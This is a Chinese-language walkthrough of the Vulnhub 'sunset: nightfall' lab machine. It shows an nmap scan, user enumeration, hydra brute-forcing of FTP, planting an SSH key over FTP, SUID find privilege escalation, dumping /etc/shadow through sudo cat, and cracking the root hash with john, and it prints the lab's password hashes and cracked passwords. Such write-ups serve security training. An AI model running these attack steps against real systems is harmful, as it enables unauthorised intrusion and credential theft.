MENU

Vulnhub Nightfall

September 22, 2020 • Read: 289 • 靶机

0x00 环境

靶机下载地址:https://www.vulnhub.com/entry/sunset-nightfall,355/
本机ip:172.20.10.3

0x01 nmap探测主机

QQ截图20200922082837.png

靶机ip为:172.20.10.4

1.png

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 20:31 EDT
Nmap scan report for 172.20.10.4
Host is up (0.00051s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         pyftpdlib 1.5.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 172.20.10.4:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 a9:25:e1:4f:41:c6:0f:be:31:21:7b:27:e3:af:49:a9 (RSA)
|   256 38:15:c9:72:9b:e0:24:68:7b:24:4b:ae:40:46:43:16 (ECDSA)
|_  256 9b:50:3b:2c:48:93:e1:a6:9d:b4:99:ec:60:fb:b6:46 (ED25519)
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 12
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsCompression, Speaks41ProtocolOld, FoundRows, InteractiveClient, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, Support41Auth, ODBCClient, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: OLmd,Js$Vcp+#m{C|fkg
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:47:6D:C6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: NIGHTFALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: NIGHTFALL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: nightfall
|   NetBIOS computer name: NIGHTFALL\x00
|   Domain name: nightfall
|   FQDN: nightfall.nightfall
|_  System time: 2020-09-21T20:31:28-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-22T00:31:28
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 172.20.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.48 seconds

发现21、22、80、139、145、3306都是开启的。先从80端口入手

QQ截图20200922083500.png

发现这只是apache的默认页面,可以爆破一下目录有没有敏感文件,这道题的话就直接放弃80端口了。

0x02 信息收集

这里可以收集一下其他服务信息
ftp:一般来说,如果ftp存在匿名登录,nmap可以扫描出用户名为ftp或anonymous,密码为空即可。
smb:smb信息可以通过enum4linux来收集

enum4linux 172.20.10.4
S-1-5-21-1679783218-3562266554-4049818721-1048 *unknown*\*unknown* (8)
S-1-5-21-1679783218-3562266554-4049818721-1049 *unknown*\*unknown* (8)
S-1-5-21-1679783218-3562266554-4049818721-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)

能够看到这里扫出来两个账户:nightfall和matt

0x03 测试服务

这里我爆破了一下smb服务

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt smb://172.20.10.4

没有爆出任何结果

再通过这个账户去爆破了一下ftp

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 172.20.10.4 ftp

QQ截图20200922092428.png

发现matt的ftp密码为cheese

QQ截图20200922092528.png

登录进来后,我们可以对比一下本机的用户目录

QQ截图20200922092704.png

发现ftp目录和用户目录极其相似,这时候就往用户目录方向思考如何获取shell。这里我想到的是通过ftp上传ssh公钥,直接免密登录matt账户。这里补充一个知识点,ssh-keygen生成的公钥,在目标机上是存入authorized_keys文件里面的,所以需要自己构造一个authorized_keys文件

QQ截图20200922093555.png

3.png

成功获取了matt的shell,接着就是进一步提权

0x04 提权

sudo -l

查看一下sudo权限,发现要输入密码,我们还没有获取matt的密码
那就通过find查看一下suid权限的文件

111.png

看到一个属主为nightfall的find命令,可以通过find用nightfall身份执行命令

/script/find . -exec id \;

uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
/scripts/find: ‘./.local/share’: Permission denied
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
/scripts/find: ‘./.gnupg’: Permission denied
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)

发现可以获取nightfall的id

123.png

成功提权到了nightfall

0x05 获取root的shell

用同样的方式,将公钥传入nightfall目录,进行免密登录。

3333333.png

成功登陆后,查看到该用户能执行root权限下的cat命令,通过/etc/shadow获取root的加密形式下的密码

sodo cat /etc/shadow

root:$6$JNHsN5GY.jc9CiTg$MjYL9NyNc4GcYS2zNO6PzQNHY2BE/YODBUuqsrpIlpS9LK3xQ6coZs6lonzURBJUDjCRegMHSF5JwCMG1az8k.:18134:0:99999:7:::
daemon:*:18126:0:99999:7:::                                                                           
bin:*:18126:0:99999:7:::                                                                              
sys:*:18126:0:99999:7:::                                                                              
sync:*:18126:0:99999:7:::                                                                             
games:*:18126:0:99999:7:::                                                                            
man:*:18126:0:99999:7:::                                                                              
lp:*:18126:0:99999:7:::                                                                               
mail:*:18126:0:99999:7:::                                                                             
news:*:18126:0:99999:7:::                                                                             
uucp:*:18126:0:99999:7:::                                                                             
proxy:*:18126:0:99999:7:::                                                                            
www-data:*:18126:0:99999:7:::                                                                         
backup:*:18126:0:99999:7:::                                                                           
list:*:18126:0:99999:7:::                                                                             
irc:*:18126:0:99999:7:::                                                                              
gnats:*:18126:0:99999:7:::                                                                            
nobody:*:18126:0:99999:7:::                                                                           
_apt:*:18126:0:99999:7:::                                                                             
systemd-timesync:*:18126:0:99999:7:::                                                                 
systemd-network:*:18126:0:99999:7:::                                                                  
systemd-resolve:*:18126:0:99999:7:::                                                                  
messagebus:*:18126:0:99999:7:::                                                                       
avahi-autoipd:*:18126:0:99999:7:::                                                                    
avahi:*:18126:0:99999:7:::                                                                            
saned:*:18126:0:99999:7:::                                                                            
colord:*:18126:0:99999:7:::                                                                           
hplip:*:18126:0:99999:7:::                                                                            
nightfall:$6$u9n0NMGDN2h3/Npy$y/PVdaqMcdobHf4ZPvbrHNFMwMkPWwamWuKGxn2wqJygEC09UNJNb10X0HBK15Hs4ZwyFtdwixyyfu2QEC1U4/:18134:0:99999:7:::
systemd-coredump:!!:18126::::::
sshd:*:18126:0:99999:7:::
mysql:!:18126:0:99999:7:::
matt:$6$2u38Z1fOk8zIC5kO$oSfp/Ic0Uhb9225EdHB63ugob.B58mPuJJ8YpMB9hNaZAoJk9n3rhs9DHobzmsB20E5Yxjqsnn1x.QGKeAmiR1:18134:0:99999:7:::

通过john这个工具爆破root的hash值密码

9999.png

爆破出root密码为miguel2

2323232323.png

获取shell